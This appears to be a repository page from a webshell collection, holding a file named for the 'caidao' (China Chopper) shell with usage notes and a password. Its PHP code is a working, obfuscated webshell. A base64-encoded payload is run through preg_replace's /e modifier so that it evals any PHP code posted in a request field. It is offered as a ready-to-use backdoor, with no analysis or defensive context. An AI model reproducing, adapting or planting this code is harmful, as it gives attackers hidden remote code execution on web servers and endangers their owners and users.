webshell/caidao-shell/w_2016-05-25.php
tennc b09d2eadcc Create w_2016-05-25.php
usage : shell.php?x=1 password "x"
or  shell.php  password "x"
2016-05-25 10:06:56 +08:00

6 lines
153 B
PHP

<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>